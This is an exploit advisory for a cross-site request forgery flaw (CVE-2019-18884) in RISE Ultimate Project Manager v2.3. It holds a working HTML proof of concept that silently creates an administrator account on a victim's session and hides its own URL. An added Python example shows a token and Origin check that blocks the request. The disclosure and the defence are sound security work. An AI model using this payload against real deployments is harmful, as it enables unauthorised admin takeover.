# Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)  
# Date: 11-11-2019  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: http://fairsketch.com/  
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641  
# Software : RISE - Ultimate Project Manager  
# Product Version: Version 2.3  
# Vulnerability Type : Cross-Site Request Forgery  
# Vulnerability : Cross-Site Request Forgery (Add Admin)  
# CVE : CVE-2019-18884  
  
# The index.php/team_members/add_team_member endpoint in RISE Ultimate Project Manager v2.3 accepts the POST below with no anti-CSRF token, so an attacker who gets a logged-in administrator to open a page hosting this form can create a new team member with an attacker-chosen password and the administrator role (role=1 in the PoC).  
  
# CSRF PoC :  
  
<html>  
<body>  
<!-- Rewrite the visible URL so the victim's address bar does not show the PoC page name -->  
<script>history.pushState('', '', '/')</script>  
<!-- Target: the vulnerable endpoint; the victim's session cookie is sent automatically by the browser -->  
<form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">  
<input type="hidden" name="first_name" value="Ismail" />  
<input type="hidden" name="last_name" value="Tasdelen" />  
<input type="hidden" name="address" value="ismailtasdelen@protonmail.com" />  
<input type="hidden" name="phone" value="+12345678975" />  
<input type="hidden" name="gender" value="male" />  
<input type="hidden" name="job_title" value="Security Researcher" />  
<input type="hidden" name="salary" value="100000" />  
<input type="hidden" name="salary_term" value="12" />  
<input type="hidden" name="date_of_hire" value="2019-11-11" />  
<input type="hidden" name="email" value="ismailtasdelen@protonmail.com" />  
<input type="hidden" name="password" value="iQ.grF10" />  
<input type="hidden" name="role" value="1" />  
<input type="hidden" name="email_login_details" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>
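The check that defeats the PoC above is a server-side one: refuse state-changing POSTs that do not carry a per-session token and do not come from the application's own origin. The following is an added example written for this page, not code from RISE or fairsketch; it models the request in a small `Request` class, uses a hypothetical `csrf_token` form field name, and feeds it a constructed copy of the PoC's POST (victim session cookie present, attacker-controlled Origin, no token) next to the same POST as the application's own form would submit it.

```python
"""Synchronizer-token + Origin/Referer CSRF check applied to the add_team_member PoC.

Added example, not RISE's code. TOKEN_FIELD and the Request class are assumptions
made for illustration; the sample requests below are constructed from the PoC form.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://rise.fairsketch.com"   # origin of the PoC's form action
TOKEN_FIELD = "csrf_token"                   # hypothetical hidden-field / session key name


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as the application sees it (constructed)."""
    method: str
    path: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)   # server-side session bound to the cookie


def issue_csrf_token(session: dict) -> str:
    """Generate a random per-session token, store it server-side, return it for the form."""
    token = secrets.token_urlsafe(32)
    session[TOKEN_FIELD] = token
    return token


def _origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_check(req: Request) -> tuple[bool, str]:
    """Return (allowed, reason).

    1. Only state-changing methods are checked (GET/HEAD/OPTIONS are treated as safe).
    2. Origin (fallback: Referer) must match the site's own origin.
    3. The form token must equal the session token, compared in constant time.
    """
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"

    source = req.headers.get("Origin") or req.headers.get("Referer")
    if source is None:
        return False, "missing Origin and Referer"
    if _origin_of(source) != SITE_ORIGIN:
        return False, f"cross-origin request from {_origin_of(source)}"

    expected = req.session.get(TOKEN_FIELD)
    supplied = req.form.get(TOKEN_FIELD)
    if not expected or not supplied:
        return False, "missing CSRF token"
    if not hmac.compare_digest(expected, supplied):
        return False, "CSRF token mismatch"
    return True, "ok"


def add_team_member(req: Request) -> dict:
    """Handler stand-in: creates the member only when the CSRF check passes."""
    allowed, reason = csrf_check(req)
    if not allowed:
        return {"status": 403, "reason": reason}
    return {"status": 200, "created": req.form.get("email"), "role": req.form.get("role")}


def poc_request(session: dict) -> Request:
    """The PoC form as the server receives it: victim's session, attacker's Origin, no token."""
    return Request(
        method="POST",
        path="/index.php/team_members/add_team_member",
        headers={"Origin": "http://attacker.example", "Cookie": "ci_session=victim"},
        form={"first_name": "Ismail", "last_name": "Tasdelen",
              "email": "ismailtasdelen@protonmail.com", "password": "iQ.grF10", "role": "1"},
        session=session,
    )


def legitimate_request(session: dict, token: str) -> Request:
    """Same POST submitted from the application's own page, carrying the embedded token."""
    req = poc_request(session)
    req.headers["Origin"] = SITE_ORIGIN
    req.form[TOKEN_FIELD] = token
    return req


if __name__ == "__main__":
    session = {}
    token = issue_csrf_token(session)
    print(add_team_member(poc_request(session)))                # rejected: cross-origin, no token
    print(add_team_member(legitimate_request(session, token)))  # accepted
```

The Origin check alone would already block the PoC, but it is kept alongside the token because some clients strip Origin and Referer; the token check then still holds, and the reason string records which check failed for logging.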